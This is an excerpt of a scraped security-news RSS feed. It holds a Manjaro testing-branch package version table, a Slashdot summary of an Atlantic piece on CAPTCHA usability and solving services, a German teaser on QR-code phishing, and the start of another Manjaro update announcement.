                          dotnet-sdk       8.0.0.sdk100-1       8.0.0.sdk100-2
       dotnet-source-built-artifacts       8.0.0.sdk100-1       8.0.0.sdk100-2
               dotnet-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                               espup              0.9.0-1             0.10.0-1
                fcitx5-pinyin-zhwiki   1:0.2.4.20231016-1   1:0.2.4.20231205-1
                                 feh             3.10.1-2             3.10.2-1
           firefox-developer-edition            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-ach            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-af            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-an            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ar            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-ast            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-az            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-be            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-bg            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-bn            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-br            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-bs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ca            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ca-valencia      121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-cak            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-cs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-cy            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-da            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-de            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-dsb            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-el            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-ca            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-gb            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-us            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-eo            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-ar            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-cl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-es            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-mx            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-et            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-eu            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fa            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ff            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fi            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-fur            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-fy-nl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ga-ie            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gd            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gn            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-gu-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-he            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-hi-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-hr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-hsb            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-hu            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-hy-am            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ia            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-id            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-is            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-it            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ja            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ka            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-kab            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-kk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-km            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-kn            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ko            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-lij            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-lt            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-lv            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-mk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-mr            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ms            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-my            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-nb-no            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ne-np            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-nl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-nn-no            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-oc            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pa-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-pl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pt-br            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pt-pt            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-rm            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ro            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ru            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sc            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-sco            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-si            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sl            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-son            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sq            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sr            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-sv-se            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-szl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ta            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-te            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tg            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-th            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-trs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-uk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ur            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-uz            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-vi            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-xh            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-zh-cn            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-zh-tw            121.0b6-1            121.0b7-1
                             freetds              1.4.9-1             1.4.10-1
                               fwupd              1.9.9-1             1.9.10-1
                          fwupd-docs              1.9.9-1             1.9.10-1
                           git-annex       10.20230926-38       10.20230926-39
                            git-grab              1.0.1-1              2.0.0-1
                               glide              0.6.0-1              0.6.1-1
                               glirc         2.39.0.1-169         2.39.0.1-170
                    haskell-arch-web               0.2-72               0.2-73
                haskell-authenticate          1.3.5.1-226          1.3.5.1-227
                         haskell-aws              0.24-93              0.24-94
                 haskell-casa-client            0.0.1-651            0.0.1-652
                  haskell-cheapskate          0.1.1.2-605          0.1.1.2-606
                haskell-coinbase-pro          0.9.3.2-121          0.9.3.2-122
                haskell-crypto-token              0.0.2-1              0.0.2-2
                     haskell-crypton               0.33-6               0.34-1
             haskell-crypton-conduit             0.2.3-25             0.2.3-26
          haskell-crypton-connection             0.3.1-22             0.3.1-23
                haskell-crypton-x509             1.7.6-17             1.7.6-18
          haskell-crypton-x509-store             1.6.9-17             1.6.9-18
         haskell-crypton-x509-system             1.6.7-17             1.6.7-18
     haskell-crypton-x509-validation            1.6.12-17            1.6.12-18
                         haskell-dav            1.3.4-624            1.3.4-625
                      haskell-ghcide           1.9.1.0-22           1.9.1.0-23
           haskell-ghcide-test-utils          1.8.0.0-148          1.8.0.0-149
                     haskell-githash           0.1.6.3-99          0.1.6.3-100
                     haskell-hadrian          0.1.0.0-144          0.1.0.0-145
                      haskell-hakyll          4.16.0.0-92          4.16.0.0-94
                 haskell-hledger-lib              1.31-28               1.32-1
haskell-hls-alternate-number-format-plugin    1.3.0.0-108          1.3.0.0-109
         haskell-hls-brittany-plugin          1.1.0.0-116          1.1.0.0-117
        haskell-hls-cabal-fmt-plugin          0.1.0.0-108          0.1.0.0-109
            haskell-hls-cabal-plugin          0.1.0.0-108          0.1.0.0-109
   haskell-hls-call-hierarchy-plugin          1.2.0.0-108          1.2.0.0-109
haskell-hls-change-type-signature-plugin      1.1.0.0-108          1.1.0.0-109
            haskell-hls-class-plugin          1.1.1.0-108          1.1.1.0-109
       haskell-hls-code-range-plugin          1.1.0.0-108          1.1.0.0-109
             haskell-hls-eval-plugin          1.4.0.0-108          1.4.0.0-109
  haskell-hls-explicit-fixity-plugin          1.1.0.0-108          1.1.0.0-109
 haskell-hls-explicit-imports-plugin          1.2.0.0-108          1.2.0.0-109
haskell-hls-explicit-record-fields-plugin     1.0.0.0-108          1.0.0.0-109
         haskell-hls-floskell-plugin          1.0.2.0-109          1.0.2.0-110
         haskell-hls-fourmolu-plugin          1.1.1.0-114          1.1.1.0-115
             haskell-hls-gadt-plugin          1.0.1.0-108          1.0.1.0-109
                   haskell-hls-graph           1.9.0.0-82           1.9.0.0-83
 haskell-hls-haddock-comments-plugin          1.1.1.0-108          1.1.1.0-109
            haskell-hls-hlint-plugin          1.1.1.0-108          1.1.1.0-109
      haskell-hls-module-name-plugin          1.1.1.0-108          1.1.1.0-109
           haskell-hls-ormolu-plugin          1.0.3.0-112          1.0.3.0-113
              haskell-hls-plugin-api           1.6.0.0-94           1.6.0.0-95
          haskell-hls-pragmas-plugin          1.0.4.0-108          1.0.4.0-109
haskell-hls-qualify-imported-names-plugin     1.0.2.0-108          1.0.2.0-109
         haskell-hls-refactor-plugin          1.1.0.0-108          1.1.0.0-109
   haskell-hls-refine-imports-plugin          1.0.4.0-108          1.0.4.0-109
           haskell-hls-rename-plugin          1.0.2.0-108          1.0.2.0-109
           haskell-hls-retrie-plugin          1.0.3.0-108          1.0.3.0-109
           haskell-hls-splice-plugin          1.0.3.0-108          1.0.3.0-109
  haskell-hls-stylish-haskell-plugin          1.0.1.2-109          1.0.1.2-110
          haskell-hls-tactics-plugin          1.8.0.0-110          1.8.0.0-111
              haskell-hls-test-utils          1.5.0.0-108          1.5.0.0-109
                     haskell-hoauth2            2.2.0-121            2.2.0-122
                       haskell-hpack            0.35.2-82            0.35.2-83
                   haskell-hspec-wai           0.11.1-384           0.11.1-385
              haskell-hspec-wai-json           0.11.0-445           0.11.0-446
                        haskell-http         4000.4.1-159         4000.4.1-160
      haskell-http-client-restricted            0.0.5-148            0.0.5-149
             haskell-http-client-tls           0.3.6.3-31           0.3.6.3-32
                haskell-http-conduit           2.3.8.3-17           2.3.8.3-18
               haskell-http-download           0.2.1.0-44           0.2.1.0-45
                       haskell-http3             0.0.1-83             0.0.1-84
                   haskell-js-jquery            3.3.1-966            3.3.1-967
           haskell-lambdabot-trusted           5.3.1.2-17           5.3.1.2-18
             haskell-language-server           1.9.1.0-25           1.9.1.0-26
                    haskell-mustache             2.4.2-62             2.4.2-63
                        haskell-oeis           0.3.10-140           0.3.10-141
             haskell-optparse-simple          0.1.1.4-290          0.1.1.4-291
                      haskell-pandoc              3.1.6-9             3.1.6-11
           haskell-pandoc-lua-engine              0.2.1-8             0.2.1-10
               haskell-pandoc-server            0.1.0.1-8           0.1.0.1-10
                      haskell-pantry            0.5.7-191            0.5.7-192
                  haskell-pipes-http            1.0.6-565            1.0.6-566
                        haskell-quic              0.1.5-2              0.1.5-3
                   haskell-recaptcha          0.1.0.4-140          0.1.0.4-141
                         haskell-req            3.13.0-93            3.13.0-94
                      haskell-scotty            0.20.1-26            0.20.1-27
              haskell-servant-client             0.19-152             0.19-153
              haskell-servant-server           0.19.2-116           0.19.2-117
                       haskell-shake           0.19.6-144           0.19.6-145
                         haskell-tls             1.8.0-15             1.8.0-16
         haskell-tls-session-manager            0.0.4-355            0.0.4-356
                       haskell-typst           0.3.2.0-11            0.3.2.1-1
            haskell-wai-app-file-cgi           3.1.10-151           3.1.10-152
              haskell-wai-app-static             3.1.8-36             3.1.8-37
                   haskell-wai-extra         3.1.13.0-214         3.1.13.0-216
          haskell-wai-handler-launch          3.0.3.1-574          3.0.3.1-575
             haskell-wai-http2-extra            0.1.3-137            0.1.3-138
                  haskell-wai-logger            2.4.0-365            2.4.0-367
       haskell-wai-middleware-static            0.9.2-215            0.9.2-216
                        haskell-warp            3.3.30-23            3.3.30-24
                   haskell-warp-quic            0.0.0-154            0.0.0-155
                    haskell-warp-tls             3.4.3-25             3.4.3-26
                        haskell-wreq           0.5.4.2-37           0.5.4.2-38
                        haskell-wuss           2.0.1.1-32           2.0.1.1-33
                       haskell-yesod          1.6.2.1-166          1.6.2.1-167
                  haskell-yesod-auth          1.6.11.2-17          1.6.11.2-18
                  haskell-yesod-core           1.6.25.0-4           1.6.25.0-5
                  haskell-yesod-form             1.7.6-43             1.7.6-44
            haskell-yesod-persistent          1.6.0.8-231          1.6.0.8-232
                haskell-yesod-static          1.6.1.0-678          1.6.1.0-679
                  haskell-yesod-test            1.6.16-12            1.6.16-13
                              hcloud             1.37.0-1             1.40.0-1
                             hledger               1.32-2               1.32-3
                          hledger-ui               1.32-2               1.32-3
                         hledger-web               1.32-3               1.32-4
                              hoogle         5.0.18.3-215         5.0.18.3-216
                      hopenpgp-tools           0.23.7-175           0.23.7-176
                            hyprland             0.32.3-1             0.33.0-1
                 ibus-typing-booster             2.24.4-1             2.24.5-1
                               idris            1.3.4-171            1.3.4-172
                            ihaskell          0.10.4.0-43          0.10.4.0-44
                   jupyter-nbconvert             7.11.0-1             7.12.0-1
                      jupyter-server             2.11.1-1             2.11.2-1
                                just             1.16.0-1             1.16.0-3
                               lapce              0.3.0-1              0.3.1-1
                               lcms2               2.15-1               2.16-1
                             libavif              1.0.2-1              1.0.3-1
                          liblangtag              0.6.6-1              0.6.7-1
         libqaccessibilityclient-qt5              0.5.0-2              0.6.0-1
         libqaccessibilityclient-qt6              0.5.0-2              0.6.0-1
                             libvirt            1:9.9.0-2           1:9.10.0-1
                      libvirt-python            1:9.9.0-1           1:9.10.0-1
             libvirt-storage-gluster            1:9.9.0-2           1:9.10.0-1
        libvirt-storage-iscsi-direct            1:9.9.0-2           1:9.10.0-1
                                love               11.4-2               11.5-1
                             maturin              1.3.2-1              1.4.0-1
                              memray             1.10.0-1             1.11.1-1
                           mighttpd2             4.0.3-68             4.0.3-69
                           mitmproxy             10.1.5-1             10.1.5-2
                           musescore              4.1.1-2              4.1.1-3
                                 mvt              2.4.3-1              2.4.4-1
               netfilter-fullconenat      r73.0cf3b48-333      r73.0cf3b48-334
          netstandard-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                              nodejs             21.2.0-1             21.3.0-1
                               opera      105.0.4970.29-1      105.0.4970.34-1
                              paccat              0.2.0-2              1.0.0-1
                          pandoc-cli           0.1.1.1-22           0.1.1.1-24
                     pandoc-crossref          0.3.16.0-75          0.3.16.0-77
                         pandoc-plot             1.8.0-14             1.8.0-16
                  papirus-icon-theme           20231201-1           20231201-2
                               passt 2023_11_19.4f1709d-1 2023_12_04.b86afe3-1
                       perl-text-csv               2.03-1               2.04-1
                        php-igbinary             3.2.14-2             3.2.15-1
                 php-legacy-igbinary             3.2.14-2             3.2.15-1
                       pkcs11-helper             1.29.0-2             1.30.0-1
                           postgrest           10.0.0-183           10.0.0-184
                               psalm             5.16.0-1             5.17.0-1
                              pulumi             3.94.2-1             3.95.0-1
                    python-fonttools             4.44.3-1             4.46.0-1
                      python-geojson              3.0.1-2              3.1.0-1
                   python-lsp-server              1.8.0-1              1.9.0-1
                      python-maturin              1.3.2-1              1.4.0-1
                         python-path             16.7.1-1             16.8.0-1
                      python-pip-run              9.2.1-3                    -
                        python-pyqt6              6.6.0-3              6.6.1-1
               python-pytest-asyncio             0.21.1-1             0.22.0-1
                   python-pytest-bdd              7.0.0-1              7.0.1-1
                python-pytest-runner              6.0.0-5              6.0.1-1
                      python-pythran             0.14.0-1             0.14.0-2
                    python-rapidjson               1.12-1               1.13-1
                         python-ruff              0.1.6-1              0.1.7-1
                   python-setuptools           1:68.2.0-1           1:68.2.1-1
                        python-sybil              5.0.3-1              6.0.0-1
                              qtpass              1.4.0-1              1.4.0-2
                         release-plz             0.3.31-1             0.3.32-1
                  rime-pinyin-zhwiki   1:0.2.4.20231016-1   1:0.2.4.20231205-1
                                ruff              0.1.6-1              0.1.7-1
                       rust-analyzer           20231127-1           20231204-1
                          rustypaste             0.14.1-1             0.14.2-1
                               stack            2.7.5-394            2.7.5-395
                           syncthing             1.26.1-1             1.27.0-1
                  syncthing-discosrv             1.26.1-1             1.27.0-1
                  syncthing-relaysrv             1.26.1-1             1.27.0-1
                            taffybar             4.0.1-40             4.0.1-41
                      tamarin-prover             1.8.0-43             1.8.0-44
                             taskell           1.11.4-394           1.11.4-395
                    telegram-desktop             4.12.1-1             4.12.2-1
                               typst            1:0.9.0-1           1:0.10.0-1
         v2ray-domain-list-community     20231128180936-1     20231202050515-1
                         v2ray-geoip       202311230040-1       202311300040-1
                           v4l-utils             1.24.1-2             1.26.0-1
                             weechat              4.1.1-1              4.1.2-1
                              xmobar             0.46-103             0.46-104
                             yoshimi            2.3.1.2-1            2.3.1.3-1
                        yoshimi-data            2.3.1.2-1            2.3.1.3-1
                        yoshimi-docs            2.3.1.2-1            2.3.1.3-1
                         yoshimi-lv2            2.3.1.2-1            2.3.1.3-1
                  yoshimi-standalone            2.3.1.2-1            2.3.1.3-1
                  aspnet-runtime-7.0                    -      7.0.14.sdk114-2
           aspnet-targeting-pack-7.0                    -      7.0.14.sdk114-2
                           catch2-v2                    -            2.13.10-1
                  dotnet-runtime-7.0                    -      7.0.14.sdk114-2
                      dotnet-sdk-7.0                    -      7.0.14.sdk114-2
   dotnet-source-built-artifacts-7.0                    -      7.0.14.sdk114-2
           dotnet-targeting-pack-7.0                    -      7.0.14.sdk114-2
                            dtk6core                    -              6.0.2-1
                 epapirus-icon-theme                    -           20231201-2
                            tailspin                    -              2.2.0-4


:: Different overlay package(s) in repository kde-unstable x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                                 ark23.08.3.r5244.gfa270780-123.08.3.r5245.gfe9db061-1
                            kalgebra23.08.3.r2262.g80f233a3-123.08.3.r2263.g392f55f3-1
                                kalk23.08.1.r819.g86d1cf4-123.08.1.r820.g4573b91-1
                            kdenlive23.08.3.r19148.ge5857e6bd-123.08.3.r19150.g90cb72782-1
                            kdisplay5.27.9.r1564.g78d160b-15.27.9.r1566.gd144d8a-1
                            keysmith23.08.1.r554.g0ade39d-123.08.1.r555.g76b0494-1
                         kfourinline23.08.3.r1174.g3ace7cb-123.08.3.r1175.ga2f40f5-1
                              kmines23.08.3.r1918.g14dc63b-123.08.3.r1920.gb260f41-1
                             knights23.08.3.r1338.g3fca3a4-123.08.3.r1339.g3cab8ea-1
                            kongress23.08.1.r428.gf5f0f1b-123.08.1.r429.gbcb9bcb-1
                             konsole23.08.3.r9307.gc34a16146-123.08.3.r9310.gaed2dd76d-1
                                krdc23.08.3.r1798.g5482ec5-123.08.3.r1799.g7a3e777-1
                             ksudoku23.08.3.r1301.gc0bfc19-123.08.3.r1302.g9b0a4cc-1
                            kweather23.08.1.r1069.g2c24376-123.08.1.r1070.g3d60b48-1
                                kwin5.27.9.r25713.g3cc8e9f13b-15.27.9.r25714.g5b4dce93e3-1
                        libkmahjongg23.08.3.r607.g4a9e67e-123.08.3.r608.gab41b5d-1
                  mauikit-imagetools3.0.1.r192.geb82b4f-13.0.1.r193.gf4a7c3b-1
                           spectacle23.08.3.r2111.g0881a996-123.08.3.r2112.g01b8ee98-1
                         cask-server                    - 3.0.1.r21.ga06979f-1


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                lib32-gamescope-plus      3.13.13.plus1-1      3.13.16.plus1-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/152811/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/152811">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are CAPTCHAs More Than Just Annoying?]]></title>
<description><![CDATA[The Atlantic writes:

Failing a CAPTCHA isn't just annoying — it keeps people from navigating the internet. Older people can take considerably more time to solve different kinds of CAPTCHAs, according to the UC Irvine researchers, and other research has found that the same is true for non-native ...]]></description>
<link>https://tsecurity.de/de/1949086/it-security-nachrichten/are-captchas-more-than-just-annoying/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1949086/it-security-nachrichten/are-captchas-more-than-just-annoying/</guid>
<pubDate>Sun, 03 Dec 2023 21:19:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Atlantic writes:

Failing a CAPTCHA isn't just annoying — it keeps people from navigating the internet. Older people can take considerably more time to solve different kinds of CAPTCHAs, according to the UC Irvine researchers, and other research has found that the same is true for non-native English speakers. The annoyance can lead a significant chunk of users to just give up. 

But is it all also just a big waste of time? The article notes there's now even CAPTCHA-solving services you can hire. ("2Captcha will solve a thousand CAPTCHAs for a dollar, using human workers paid as low as 50 cents an hour. Newer companies, such as Capsolver, claim to instead be using AI and charge roughly the same price.") 

And they also write that this summer saw more discouraging news:

In a recent study from researchers at UC Irvine and Microsoft: 
- most of the 1,400 human participants took 15 to 26 seconds to solve a CAPTCHA with a grid of images, with 81% accuracy. 

- A bot tested in March 2020, meanwhile, was shown to solve similar puzzles in an average of 19.9 seconds, with 83% accuracy. 

The article ultimately argues that for roughly 20 years, "CAPTCHAs have been engaged in an arms race against the machines," and that now "The burden is on CAPTCHAs to keep up" — which they're doing by evolving.

The most popular type, Google's reCAPTCHA v3, should mostly be okay. It typically ascertains your humanity by monitoring your activity on websites before you even click the checkbox, comparing it with models of "organic human interaction," Jess Leroy, a senior director of product management at Google Cloud, the division that includes reCAPTCHA, told me. 

But the automotive site Motor Biscuit speculates something else could also be happening. "Have you noticed it likes to ask about cars, buses, crosswalks, and other vehicle-related images lately?"
Google has not confirmed that it uses the reCAPTCHA system for autonomous vehicles, but here are a few reasons why I think that could be the case. Self-driving cars from Waymo and other brands are improving every day, but the process requires a lot of critical technology and data to improve continuously. 

According to an old Google Security Blog, using reCAPTCHA and Street View to make locations on Maps more accurate was happening way back in 2014... [I]t would ask users to find the street numbers found on Google Street View and confirm the numbers matched. Previously, it would use distorted text or letters. Using this data, Google could correlate the numbers with addresses and help pinpoint the location on Google Maps... 


Medium reports that more than 60 million CAPTCHAs are being solved every day, which saves around 160,000 human hours of work. If these were helping locate addresses, why not also help identify other objects? Help differentiate a bus from a car and even choose a crosswalk over a light pole. 

Thanks to Slashdot reader rikfarrow for suggesting the topic.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Are+CAPTCHAs+More+Than+Just+Annoying%3F%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F23%2F12%2F03%2F1957243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F23%2F12%2F03%2F1957243%2Fare-captchas-more-than-just-annoying%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/23/12/03/1957243/are-captchas-more-than-just-annoying?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quishing-Angriffe auf dem Vormarsch]]></title>
<description><![CDATA[Der Einsatz von Technologie entwickelt sich ständig weiter, um privates und berufliches Leben bequemer zu gestalten, wie sich am Quick Response (QR)-Code zeigt. 

Tags: #Hacker | #QR-Code | #Ransomware | #Social Engineering]]></description>
<link>https://tsecurity.de/de/1909095/it-security-nachrichten/quishing-angriffe-auf-dem-vormarsch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1909095/it-security-nachrichten/quishing-angriffe-auf-dem-vormarsch/</guid>
<pubDate>Sat, 28 Oct 2023 05:19:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg" class="attachment-full size-full wp-post-image" alt="Quishing" decoding="async" fetchpriority="high" srcset="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Quishing-Angriffe auf dem Vormarsch 1"></p>
    Der Einsatz von Technologie entwickelt sich ständig weiter, um privates und berufliches Leben bequemer zu gestalten, wie sich am Quick Response (QR)-Code zeigt. 

<p>Tags: <a href="https://www.it-daily.net/thema/hacker">#Hacker</a> | <a href="https://www.it-daily.net/thema/qr-code">#QR-Code</a> | <a href="https://www.it-daily.net/thema/ransomware">#Ransomware</a> | <a href="https://www.it-daily.net/thema/social-engineering">#Social Engineering</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2023-09-13 - Kernels, KDE Frameworks, Plasma, KDE-Git]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some usual package updates for you.

Get the lastest SoftMaker Office with ChatGPT buillt-in. You will find our Special Offer here!
Recent News:

Manjaro, like many other open-source projects, relies on the generosity of its community through do...]]></description>
<link>https://tsecurity.de/de/1899532/unix-server/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1899532/unix-server/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/</guid>
<pubDate>Fri, 20 Oct 2023 19:50:55 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some usual package updates for you.</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/3X/4/2/42e8550ce72aa8ff000d704ed0fa0a698556b13e.jpeg" alt="image" data-base62-sha1="9xThw8e1scYGHvHqifKkf1T8ODQ" width="580" height="326"><br>
<em>Get the lastest <a href="https://www.softmaker.com/en/products/softmaker-office">SoftMaker Office with ChatGPT buillt-in</a>. You will find our <a href="https://softmaker.com/go/manjaro">Special Offer here</a>!</em></p>
<p><strong>Recent News:</strong></p>
<ul>
<li>Manjaro, like many other open-source projects, relies on the generosity of its community through <a href="https://manjaro.org/donate/">donations</a> and corporate sponsorships to support its growth and development. These <a href="https://manjaro.org/donate/">donations</a> are essential in covering the various expenses incurred in the operations of the project such as server costs, software development tools, infrastructure expenses, training, flying people to events or <a href="https://blog.manjaro.org/fosdem-2023/">conferences</a> and the salaries of key developers. With the help of these donations, Manjaro is able to secure the necessary financial stability that allows the project to continuously improve and remain active. If you love Manjaro, consider to <a href="https://manjaro.org/donate/">donate</a>!</li>
<li>As you might have seen some of our team were able to attend <a href="https://fosdem.org/2023/">FOSDEM 2023</a> and the conference proved to be incredibly productive for us. See <a href="https://blog.manjaro.org/fosdem-2023/">our blog post</a> for more.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/147907/1">(click for more details)</a>
<p><strong>Notable Package Updates:</strong></p>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
<li><strong>KDE Plasma</strong> got updated to <a href="https://kde.org/announcements/plasma/5/5.27.8/">5.27.8</a></li>
<li><strong>KDE Frameworks</strong> are now at <a href="https://kde.org/announcements/frameworks/5/5.110.0/">5.110.0</a></li>
<li>Usual <strong>KDE-git</strong>, <strong>Haskell</strong> and <strong>Python</strong> updates</li>
</ul>
